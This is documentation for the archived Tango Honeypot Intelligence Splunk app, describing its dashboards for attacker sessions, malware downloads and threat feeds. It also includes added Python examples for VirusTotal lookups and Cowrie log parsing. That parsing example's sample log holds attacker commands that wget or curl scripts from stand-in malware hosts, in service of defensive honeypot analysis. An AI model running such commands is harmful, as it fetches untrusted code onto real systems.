Tango Honeypot Intelligence

This app has been archived.
This app is NOT supported by Splunk.
Using this companion Splunk app with the scripts and apps in the Tango Honeypot Intelligence project, you can quickly deploy and manage your honeypots, while also being able to view your honeypot logs with ease. This app provides the dashboards and functionality to give you the maximum visibility into your honeypot network, so you can research the malware and sessions without having to create your own front-end solution for a large honeypot deployment.

About

Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions.

Requirements

  • You will need to add your own VirusTotal API key to the Splunk app; it is configured in /opt/splunk/etc/apps/tango/bin/vt.py. The API key is free to obtain; follow the procedure on the VirusTotal website to receive one. Note that you are limited to 4 requests per minute; if you attempt more than that, you will not receive any information. This applies to the File Analysis section of the Splunk Honeypot Intelligence app.
  • For the VirusTotal custom command to work, you'll need to add the source of the Python library "requests" to the tango app's bin directory, /opt/splunk/etc/apps/tango/bin/. Requests can be found here: Kenneth Reitz Github.
  • To install requests, run git clone https://github.com/kennethreitz/requests/ in /tmp, then move the folder called requests from inside that directory into /opt/splunk/etc/apps/tango/bin/.
  • If you want to add some visualizations to Tango, you will need to install the dendrogram Splunk app, which can be found here. Once installed, run the command below to move its contents over to Tango:
$ cp -r /opt/splunk/etc/apps/hobbes3_dendrogram/appserver/static/ /opt/splunk/etc/apps/tango/appserver/static
  • By default, this app displays the count and values of the nodes, which can be visually distracting. If you wish to stop these values from being displayed, edit the autodiscover.js file in /opt/splunk/etc/apps/tango/appserver/static/dendrogram/dendrogam.js and change lines 206 and 207 to:
var long_label = d.name
var short_label = d.name
  • Restart Splunk after you have made the above changes.

Before You Begin

There are a few things that should be noted before you install:

  • The Tango Honeypot Intelligence Splunk App is built to use JSON-formatted data from Kippo. This was made available in the fork maintained by Michel Oosterhof, which can be found on his GitHub. He recently added this feature, so you will need to grab the latest copy for this app to work properly (if deploying the honeypot and Splunk separately).
  • If you want to automatically deploy preconfigured honeypots alongside a Splunk Universal Forwarder, you can use the other tools included with Tango, which can be found on the Tango GitHub project page.

Using the Tango Honeypot Intelligence Splunk App

Once you enter the app, you'll be first taken to the "Attack Overview" portion of the app, which shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.

You'll notice at the top of the app, in the navigation pane, there are multiple categories of reports available to you, which include:

  • Attack Analysis
  • File Analysis
  • Network Analysis
  • Sensor Management
  • Threat Feed

Below we will go through each section and describe some of the data available in each section.

Attack Analysis

Attack Overview

This dashboard shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.

Session Playlog

This is one of the most beneficial dashboards available in the app, since it actually shows you what the attacker is doing on your honeypot. At the top of the dashboard, you can see the most recent sessions along with a filter to select a particular sensor. Clicking on a session will populate the panels below, which includes the passwords attempted/accepted, the commands entered, any files downloaded during the session and the raw logs for the session.

Attacker Profile

Using this dashboard, you can inquire about a certain IP and, if it has been seen in the app, you can get valuable information pertaining to that IP, including:

  • Geolocational data
  • Times seen
  • SSH Client versions
  • Sessions seen
  • Files Downloaded
  • Malware Downloaded Visualization

Session Analysis

This series of dashboards contains some analytical information, including the percentage of sessions with interaction, the various SSH versions seen, some environment details extracted from the session, and a Human vs. Bot Identification dashboard.

Location Overview

In this section, you are able to see various geographical data related to each session and attacker. There are currently three dashboards available:

  • Top countries from which attackers have logged in
  • Top countries from which attackers have scanned
  • Top sensors that have been attacked

We also include a map showing the locations of the attackers seen.

Username/Password Analysis

Currently, this dashboard contains the top usernames and passwords seen being attempted by the attackers, as well as the top username/password combinations.

Malware Analysis

File Analysis

Starting at the top of this page, you can see the latest files downloaded by attackers, with the following details:

  • URL of file
  • SHA256 Hash of file
  • Sensor on which the file was seen being downloaded
  • The identifier of the session in which the file was downloaded
  • The time that the file was downloaded

Below that is the latest "Attempted" file downloads. This contains URLs that were seen in a session but have no corresponding SHA256 hash (a hash indicates a successful download). This can be due to a server error on the hosting website, an incorrect spelling of the file name, or the URL appearing elsewhere in the command, perhaps as an argument or as the target site of the malware.

Lastly, there is a panel in which you can look up a previously downloaded SHA256 hash in VirusTotal to retrieve the following information:

  • Date Scanned
  • SHA256 Hash
  • How many AV vendors identified this file
  • The various signatures of the file

Please note that the VirusTotal API is limited to 4 requests per minute. With that in mind, you can use this panel to quickly look up the file hashes seen in your sessions.

This "lookup" produces a local "cache" that is used by other dashboards, so it's useful to run lookups on any malware you see. This was created due to limitations in the VirusTotal API and will be used as a workaround for the time being.
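As an added example (not Tango's own vt.py), the following Python shows how the local "cache" and the 4-requests-per-minute limit described above can be handled together: repeat lookups are served from the cache without touching the API, and once the quota is spent a cache miss returns "unknown" instead of an empty verdict. The VTLookup class, the fake_fetch stand-in and the VT v2-style response fields (scan_date, positives, total, scans) are assumptions for the example.

```python
import time
from collections import deque

VT_RATE_LIMIT = 4       # public API quota stated on the page: 4 requests per minute
VT_WINDOW_SECS = 60.0

class VTLookup:
    """Serve repeat hash lookups from a local cache; only misses hit the API, and
    misses are refused rather than queued once the per-minute quota is spent."""

    def __init__(self, fetch, clock=time.monotonic):
        self.fetch = fetch    # callable(sha256) -> VT-style report dict; the real HTTP call in production
        self.clock = clock    # injectable so quota behaviour can be tested without waiting
        self.cache = {}       # sha256 -> normalised report (the page's local "cache")
        self.calls = deque()  # timestamps of API calls inside the current window

    def quota_left(self):
        now = self.clock()
        while self.calls and now - self.calls[0] >= VT_WINDOW_SECS:
            self.calls.popleft()
        return VT_RATE_LIMIT - len(self.calls)

    def lookup(self, sha256):
        sha256 = sha256.lower()
        if sha256 in self.cache:
            return self.cache[sha256]             # cache hit: no API call at all
        if self.quota_left() <= 0:
            return None                           # quota spent: report "unknown", never fake a verdict
        self.calls.append(self.clock())
        raw = self.fetch(sha256)
        report = {
            "sha256": sha256,
            "scan_date": raw.get("scan_date"),
            "positives": raw.get("positives", 0),
            "total": raw.get("total", 0),
            "signatures": sorted({v["result"] for v in raw.get("scans", {}).values() if v.get("detected")}),
        }
        self.cache[sha256] = report
        return report

# Constructed stand-in for a VT v2 file/report response (not a real scan result)
def fake_fetch(sha256):
    return {"scan_date": "2015-09-28 00:00:00", "positives": 2, "total": 3,
            "scans": {"AV-A": {"detected": True, "result": "Linux.Trojan.Example"},
                      "AV-B": {"detected": True, "result": "ELF/Example.A"},
                      "AV-C": {"detected": False, "result": None}}}
```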

Malware Analysis

This dashboard shows the Top 10 Malware Signatures we've seen over time, as well as the most recent confirmed malware. It is populated from the VirusTotal local "cache" built on the File Analysis page. It also shows files that have been downloaded but produced no signatures in VirusTotal.

Malware Campaigns

This set of reports gives you information on possible campaigns associated with your sessions. Currently this includes:

  • Potential Malware Campaigns (By URL)
  • Potential Malware Campaigns (By Domain)
  • Potential Malware Campaigns (By Filename)
  • Potential Malware Campaigns (By SHA Hash)

This section will continue to be developed to include other possible campaign attribution by looking at other TTPs associated with each session. This could include commands entered during each session and terminal variables (size, language, SSH keys, etc.). For now, we can see the URLs, domains and filenames that have been used by multiple attackers.
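The three views above (the Session Playlog's per-session passwords, commands and downloads; the "Attempted" downloads that have a URL but no hash; and "Potential Malware Campaigns (By URL)") all derive from the same grouping of honeypot events by session. Here is an added Python example of that grouping, not code from the Tango project; it uses current Cowrie eventid names and a regex for URLs in commands, both assumptions, and the sample log lines are constructed.

```python
import json
import re
from collections import defaultdict

# Constructed sample Cowrie JSON events (not real honeypot data); field names are assumed
SAMPLE_LOG = """
{"eventid":"cowrie.login.failed","session":"s1","src_ip":"203.0.113.5","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","session":"s1","src_ip":"203.0.113.5","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","session":"s1","src_ip":"203.0.113.5","input":"wget http://malware.example/x.sh"}
{"eventid":"cowrie.session.file_download","session":"s1","src_ip":"203.0.113.5","url":"http://malware.example/x.sh","shasum":"aaaa"}
{"eventid":"cowrie.command.input","session":"s2","src_ip":"198.51.100.9","input":"curl -O http://malware.example/x.sh"}
{"eventid":"cowrie.command.input","session":"s3","src_ip":"192.0.2.7","input":"wget http://other.example/bot.bin"}
"""
URL_RE = re.compile(r"https?://[^\s'\";|&]+")   # assumed: good enough for wget/curl style commands

def parse_sessions(log_text):
    """Group Cowrie JSON events by session id into the fields the Session Playlog shows."""
    sessions = defaultdict(lambda: {"src_ip": None, "passwords": [], "commands": [], "downloads": []})
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["passwords"].append((ev["username"], ev["password"], eid.endswith("success")))  # (user, pw, accepted)
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev["url"], ev.get("shasum")))  # shasum present only on a real download
    return dict(sessions)

def attempted_downloads(sessions):
    """URLs typed in a session that never yielded a file hash (the 'Attempted' downloads panel)."""
    return [(sid, u) for sid, s in sessions.items() for c in s["commands"] for u in URL_RE.findall(c)
            if u not in {url for url, sha in s["downloads"] if sha}]

def campaigns_by_url(sessions):
    """URLs referenced by more than one attacker IP ('Potential Malware Campaigns (By URL)')."""
    seen = defaultdict(set)
    for s in sessions.values():
        for u in {u for u, _ in s["downloads"]} | {u for c in s["commands"] for u in URL_RE.findall(c)}:
            seen[u].add(s["src_ip"])
    return {u: sorted(ips) for u, ips in seen.items() if len(ips) > 1}
```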

Network Analysis

Network Analysis

This dashboard currently includes reports on the following:

  • Top Domains Seen
  • Same URI on Multiple Domains
  • Latest IP Addresses Seen

Network Visualization

This dashboard provides a graphical representation of the malware downloaded onto each sensor by each attacker, along with the URL and SHASUM of the malware.

Sensor Management

Add Sensor

This page contains the necessary commands to run on a system to install a honeypot using scripts from the Tango repository.

Edit Sensor

In this dashboard, you are able to edit a few fields for your sensors. These fields are:

  • Owner
  • Owner Email
  • Comment

Sensor Status

This dashboard provides geographical information pertaining to each sensor currently deployed. You will find the following information available to you in this dashboard:

  • Sensor Name
  • Last Active
  • Sensor IP Address (External IP)
  • ASN
  • ASN Country
  • Network Name
  • Network Range

This dashboard also provides you with a map populated with the locations of all your sensors deployed.

Threat Feed

Lastly, this dashboard contains feeds which you can download and integrate with other network monitoring solutions, which will hopefully be automated in the future.

The feeds currently available are:

  • IP Addresses
  • Potentially Malicious URLs
  • SHA File Hashes
  • Potentially Malicious Domains
  • File Names

To-Do

  • Utilize Data Models to speed up searches
  • Auto-extract indicators inside of malware
  • TOR Exit Node Identifier

Known Issues

  • The sensor management page will not update automatically; it is currently set to populate new sensors at midnight. I'm working on a better way to do this.

Credits

Release Notes

Version 2.1 (Sept. 28, 2015)

  • Fixed permissions error and updated dashboards

Version 2.0 (Sept. 25, 2015)

  • Now ships with UF 6.3.0
  • Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes

Version 1.5 (March 23, 2015)

  • Bug Fix: Updated App Logo
  • Bug Fix: Fixed an issue with Attacker Profile not showing interactive sessions
  • Enhancement: Fixed 'Add Sensor' page with correct code syntax
  • Enhancement: Fixed Colorscheme
  • Enhancement: Added new page - Network Visualization
  • Enhancement: Added visualization in Attacker Profile

Version 1.4.1 (March 23, 2015)

  • Bug Fix: Updated App Logo

Version 1.4 (March 23, 2015)

  • Bug Fix: Fixed an issue with Attacker Profile not showing interactive sessions
  • Enhancement: Fixed 'Add Sensor' page with correct code syntax
  • Enhancement: Fixed Colorscheme

Version 1.3 (March 19, 2015)

  • Fixed App Logo

Version 1.2 (March 19, 2015)

  • Attempted to fix App Logo again
  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1 (March 13, 2015)

  • Fixed App Logo

Version 1.0 (March 13, 2015)

  • Version 1.0 Release
